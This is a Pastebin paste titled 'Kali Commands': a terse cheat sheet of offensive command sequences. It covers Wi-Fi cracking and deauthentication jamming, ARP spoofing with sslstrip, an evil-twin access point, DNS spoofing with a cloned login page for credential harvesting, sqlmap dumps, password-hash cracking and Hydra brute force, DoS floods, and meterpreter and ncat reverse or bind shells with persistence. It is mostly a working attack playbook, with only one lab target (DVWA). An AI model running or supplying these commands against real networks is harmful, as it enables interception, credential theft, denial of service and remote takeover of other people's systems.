SHARE
TWEET

Kali Commands

a guest Aug 14th, 2016 1,433 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sites:
  2. nmap.org
  3. exploit-db.com
  4.  
  5. TOR
  6. apt-get install tor -y
  7. adduser anon
  8. nano /etc/proxychains.conf
  9. USE SOCKS5
  10. uncomment dynamic_chain
  11. get root (su)
  12. add "socks5  127.0.0.1 9050" to end of the file
  13. service tor status
  14. service tor start
  15. proxychains firefox www.duckduckgo.com
  16. check dns leak
  17. proxychains nmap
  18.  
  19. VPN
  20. cat /etc/resolv.conf
  21. nano /etc/dhcp/dhclient.conf
  22. change "#prepend domain-name-servers 127.0.0.1;"
  23. to OpenDNS addresses seperated by a comma
  24. service network-manager restart
  25. cat /etc/resolv.conf
  26. disable webart
  27. about:config in iceweasel
  28. change media.peerconnection.enabled to false and restart
  29. www.vpnbook.com (download software and get username and password)
  30. unzip VPNBook*.zip
  31. openvpn vpnbook*.ovpn
  32. www.dnsleaktest.com
  33.  
  34. Macchanger
  35. macchanger -s eth0
  36. macchanger -r eth0
  37. macchanger -p eth0
  38.  
  39. MAC_Change.sh (chmod +x)
  40. [
  41. #!/bin/bash
  42. ifconfig eth0 down
  43. sleep 2
  44. macchanger -r eth0
  45. sleep 2
  46. ifconfig eth0 up
  47. ]
  48. crontab -e (@reboot /path/MAC_Change.sh)
  49.  
  50. Nmap (Zenmap)
  51. Test: http://scanme.nmap.org/
  52. nslookup [site or IP address]
  53. curl ipinfo.io/[IP address]
  54. nmap scanme.nmap.org -vv
  55. nmap -oG - 192.168.1.0-255 -p 22 -vv > /home/SCAN
  56. cat SCAN | grep Up | awk -F " " '{print $2}' > SCAN2
  57. nmap -iL SCAN2 -vv
  58.  
  59. Reaver
  60. Donwload from Google Code and extract the gzip
  61. tar -zxvf file.tar.gz -C /path/to/directory
  62. {
  63. -z : Work on gzip compression automatically when reading archives.
  64. -x : Extract archives.
  65. -v : Produce verbose output i.e. display progress and extracted file list on screen.
  66. -f : Read the archive from the archive to the specified file. In this example, read backups.tar.gz archive.
  67. -t : List the files in the archive.
  68. }
  69. ./configure
  70. make
  71. make install
  72. Get Crunch Worldlist Generator from Soureforge and ungzip
  73. make
  74. make install
  75. Install USB wireless adapter with VirtualBox extension pack
  76. iwlist wlan0 scan | grep ESSID
  77. monitor.sh (chmod +x)
  78. [
  79. ifconfig wlan0 down
  80. iwconfig wlan0 mode monitor
  81. ifconfig wlan0 up
  82. macchanger wlan0 -r
  83. ]
  84. airmon-ng check wlan0
  85. kill NetworkMonitor then dhclient then others
  86. airodump-ng wlan0
  87. airodump-ng -c [channel #] -w SCAN_DUMP --bssid [MAC adress] wlan0
  88. For WEP
  89. {
  90. At same time: aireplay-ng -1 0 -a [MAC address] wlan0
  91. aireplay-ng -3 -b [MAC address] wlan0
  92. aircrack-ng SCAN_DUMP
  93. }
  94. At same time: aireplay-ng -0 0 -a [MAC address] wlan0
  95. Ctrl-C
  96. crunch [min-length] [max-length] -t [pattern] -f charset.lst | [aircrack-ng -w - SCAN_DUMP -e [BSSID]
  97. wash -i wlan0
  98. reaver -b [MAC address] -i wlan0 -c [channel #] -r [# trys]:[per secs] -vv
  99.  
  100. Wireless DNS Jamming
  101. ./monitor.sh
  102. airmon-ng check wlan0 (kill processes)
  103. airodump-ng wlan0
  104. iwconfig wlan0 channel [#]
  105. aireplay-ng -0 0 -a [MAC address] wlan0
  106. jam.sh (chmod +x)
  107. [
  108. #!/bin/bash
  109. while true
  110. do
  111. aireplay-ng -0 5 -a [MAC address] wlan0 (optional "-c [MAC address]" for client)
  112. iwconfig wlan0 channel [#]
  113. ifconfig wlan0 down
  114. macchanger -r wlan0 | grep "New MAC"
  115. iwconfig wlan0 mode monitor
  116. ifconfig wlan0 up
  117. iwconfig wlan0 | grep Mode
  118. sleep 3
  119. echo Waiting!
  120. done
  121. ]
  122. Monitor with: airodump-ng -c [channel #] --bssid [MAC adress] wlan0
  123.  
  124. SSL Strips
  125. echo 1 > /proc/sys/net/ip4/ip_forward
  126. iptables -t nat -A PREROUTING -p tcp --destination-port -j REDIRECT --to-port 8080
  127. iptables -t nat -L PREROUTING
  128. FIND TARGET (nmap 92.168.1.2-254 -vv)
  129. arpspoof -i wlan0 -t [gateway ip] -r [target ip]
  130. At same time: iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
  131. At same time: sslstrip -l 8080
  132. At same time: tail -f sslstrip.log
  133.  
  134. SQUID
  135. apt-get install imagemagick ghostscript jp2a apache2 squid3
  136. Download SQUID scripts
  137. nano /etc/squid3/squid.conf
  138. Uncomment: acl localnet src 192.168.0.0/16 (or local network)
  139. Uncomment: http_access allow localnet
  140. Modify to: http_port 3128 transparent
  141. Add to bottom: url_rewrite_program [path]/[script.pl]
  142. service squid3 restart
  143. echo 1 > /proc/sys/net/ip4/ip_forward
  144. iptables -t nat -A PREROUTING -i wlan0 -p tcp --destination-port 80 -j REDIRECT --to-port 3128
  145. mkdir /var/www/tmp
  146. chmod 777 /var/www/tmp
  147. service httpd restart
  148. service apache2 restart
  149. arpspoof -i wlan0 -t [gateway ip] -r [target ip]
  150.  
  151. Evil Twin
  152. Enter monitor mode and kill processes
  153. apt-get install bridge-utils wireshark
  154. airodump-ng wlan0
  155. airbase-ng -a [clone MAC address] --essid "Something" -c 6 wlan0
  156. aireplay-ng -0 0 -a [clone MAC address] wlan0
  157. brctl addbr evil
  158. brctl addif evil wlan0
  159. brctl addif evil at0
  160. ifconfig at0 0.0.0.0 up
  161. ifconfig evil up
  162. dhclient3 evil
  163. Listen to evil with wireshark
  164.  
  165. Router Vulnerability
  166. Example:
  167. nmap -p80 --script http-tplin-dir-traversal.nse --script-args rfile=/tmp/ath0.ap_bss -d -n -Pn IPList
  168.  
  169. DNS Post Authentication Exploit
  170. dnschef --fakeip=192.168.1.102 --fakedomains=randomName.com --interface=192.168.1.102
  171. setoolkit (1->2->3->2) site cloner
  172. nslookup [site you want to clone]
  173. cd /var/www
  174. tail -f harvester_file.txt
  175.  
  176. SQL Injection
  177. Download DVWA (www.dvwa.co.uk)
  178. Copy the DVWA folder to clean /var/www/
  179. chmod -Rv 777 /var/www/DVWA*
  180. apt-cache search mysql | grep -i database | less
  181. apt-get install mysql-client mysql-server
  182. service mysql start
  183. service mysql restart
  184. mysql -h localhost -u root
  185. SET PASSWORD FOR root@localhost=PASSWORD('test');
  186. mysql -h localhost -u root -p
  187. nano /var/www/DWVA*/config.inc.php (change password setting)
  188. service mysql status
  189. service apache2 restart
  190. Go to localhost in browser (user: admin password: password)
  191. burpsuite (turn on intercept)
  192. Set manual proxy in brower to HTTP: 127.0.0.1 Port: 8080
  193. Get PHPSESSID
  194. sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" --dbs
  195. sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -D dvwa --tables
  196. sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -T users --column
  197. sqlmap -u "[Full URL]" --cookie="security=low; PHPSESSID=[PHPSESSID]" -C first_name,last_name,user,password users --dump
  198. Use hash password cracking
  199.  
  200. Cracking Hashes
  201. findmyhash MD5 -h [hash code]
  202. Change "ro" to "rw" and add "init=/bin/bash" to end of GRUB boot
  203. unshadow /etc/passwd /etc/shadow > pass
  204. john pass
  205. For Windows:
  206. Get pwdump7 from openwall.com
  207. pwdump7.exe > pass
  208. john pass
  209. john --show pass
  210. Hydra:
  211. Get name fields from HTML login form
  212. hyrda -l user -P passlist.txt [server IP] http-post-form ["rest of URL path:[username]=^USER^&[password]=^PASS^&Login=Login:[fail message]"] -V
  213. Can also use hydra-gtk GUI
  214.  
  215. DoS Demonstration
  216. hping3 -i u100 -S -p 80 [IP address]
  217. nmap --script http-slowloris --max-paralellism 400 [IP address]-vv
  218. ./slowloris.pl -dns [IP address] -port 80 -num 500
  219.  
  220. Reverse Shells
  221. service postgresql start
  222. service metasploit start
  223. msfupdate
  224. msfconsole
  225. In console: msfpayload windows/meterpreter/reverse_tcp LHOST=[IP address] x > /root/Desktop/CMD.exe
  226. use exploit/multi/handler
  227. set payload windows/meterpreter/reverse_tcp
  228. set LHOST [IP address]
  229. set LPORT [Port #]
  230. exploit
  231. help
  232. shell
  233. background
  234. sessions -l
  235. sessions -i [#]
  236. use post/windows/escalate
  237. use exploit/windows/local/ask
  238. show options
  239. set session [#]
  240. exploit
  241. getsystem
  242. run persistence -X
  243. ncat -v- -l -p port -e /bin/bash &
  244. Also: ncat -v -l -n -p [port] -e cmd.exe
  245. Other machine: ncat [IP address] [port]
  246. nmap localhost
  247. lsof -i :[port]
  248. kill processes using port
  249. ncat --ssl -l -p [port]
  250. Other machine: ncat -ssl [IP address] [port]
  251. Download php-reverse-shell
  252. Rename, change IP and upload
  253. Rename and forward in burpsuite
  254. nmap -v -l -p [port]
  255.  
  256. etc...
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top